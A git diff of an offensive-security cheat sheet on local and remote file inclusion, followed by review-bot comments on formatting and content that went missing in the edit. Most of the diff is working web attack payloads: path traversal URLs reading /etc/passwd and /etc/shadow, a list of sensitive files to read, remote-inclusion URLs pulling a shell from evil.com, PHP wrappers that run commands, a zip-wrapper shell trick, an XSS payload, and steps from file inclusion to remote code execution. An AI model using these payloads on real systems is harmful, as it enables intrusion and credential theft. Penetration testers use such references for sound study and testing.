diff --git a/File Inclusion - Path Traversal/README.md b/File Inclusion - Path Traversal/README.md index 8632bd4..4e08f9c 100644 --- a/File Inclusion - Path Traversal/README.md +++ b/File Inclusion - Path Traversal/README.md @@ -1,9 +1,7 @@ # Local/Remote File Inclusion The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. -## Exploit - -Basic LFI (null byte, double encoding and other tricks) +## Basic LFI (null byte, double encoding and other tricks) ``` http://example.com/index.php?page=etc/passwd http://example.com/index.php?page=etc/passwd%00 @@ -12,6 +10,31 @@ http://example.com/index.php?page=%252e%252e%252f http://example.com/index.php?page=....//....//etc/passwd ``` +Interesting files to check out : +``` +/etc/issue +/etc/passwd +/etc/shadow +/etc/group +/etc/hosts +/etc/motd +/etc/mysql/my.cnf +/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor) +/proc/self/environ +/proc/version +/proc/cmdline +``` + +## Basic RFI (null byte, double encoding and other tricks) +``` +http://example.com/index.php?page=http://evil.com/shell.txt +http://example.com/index.php?page=http://evil.com/shell.txt%00 +http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt +``` + + + +## LFI / RFI Wrappers LFI Wrapper rot13 and base64 - php://filter case insensitive ``` @@ -26,7 +49,10 @@ http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encod LFI Wrapper ZIP ```python -os.system("echo \"\" > payload.php; zip payload.zip payload.php; mv payload.zip shell.jpg; rm payload.php") +echo "" > payload.php; +zip payload.zip payload.php; +mv payload.zip shell.jpg; +rm payload.php http://example.com/index.php?page=zip://shell.jpg%23payload.php ``` 
@@ -43,13 +69,25 @@ http://example.com/index.php?page=php:expect://id http://example.com/index.php?page=php:expect://ls ``` - -XSS via RFI/LFI with "<svg onload=alert(1)>" payload - +## Bonus XSS +XSS via RFI/LFI with "" payload ``` http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+ ``` +## LFI to RCE via /proc/*/fd +1. Upload a lot of shells (for example : 100) +2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD +with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too) + + +## LFI to RCE via Upload +``` +http://example.com/index.php?page=path/to/uploaded/file.png +``` +You can injected the into the metadata + ## Thanks to * [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion) * [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/) +* [Turning LFI to RFI ](https://l.avala.mp/?p=241)
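Review bot: in the `@@ -12,6 +10,31 @@` hunk, the explanatory parenthetical on the `/proc/[0-9]*/fd/[0-9]*` entry sits inside the code fence, so it reads as part of the path; move "(first number is the PID, second is the filedescriptor)" to prose under the block and write "file descriptor" as two words. The lead-in "Interesting files to check out :" has a space before the colon, and three consecutive blank lines precede the new "## LFI / RFI Wrappers" heading where one would do. The new "Basic RFI" section also gives no hint of what the target must allow for a remote URL to be included at all; one sentence on that precondition (in PHP, the `allow_url_include` setting) would tell readers why these three URLs often fail where the LFI examples above them succeed.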
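Review bot: in the `@@ -26,7 +49,10 @@` hunk, the fence is still tagged ```python although the replaced `os.system(...)` line has become four plain shell commands (`echo "" > payload.php;` through `rm payload.php`); tag the block as shell instead. As shown, `echo "" > payload.php` writes an empty file, so the resulting zip contains nothing useful to include; the intended file contents appear to have been lost in this edit and should be checked against the original line. The trailing semicolons are unnecessary once each command is on its own line, and the final `http://example.com/index.php?page=zip://shell.jpg%23payload.php` URL is not a shell command, so it belongs in its own block or in prose after the fence.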
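Review bot: in the `@@ -43,13 +69,25 @@` hunk, the new line `XSS via RFI/LFI with "" payload` drops the payload that the removed line carried (`<svg onload=alert(1)>`, which is also what the base64 in the URL below decodes to); restore it inside the quotes, in backticks so Markdown does not swallow it as a tag, which is likely how it went missing. In the "LFI to RCE via Upload" section, `You can injected the into the metadata` has a verb error and a missing noun between "the" and "into"; the sentence should say what is injected into the image's metadata. In the "LFI to RCE via /proc/*/fd" list, the `with $PID = ...` line continues step 2 but is not indented, so Markdown renders it as a separate paragraph. The added reference has a trailing space in its link text (`[Turning LFI to RFI ]`).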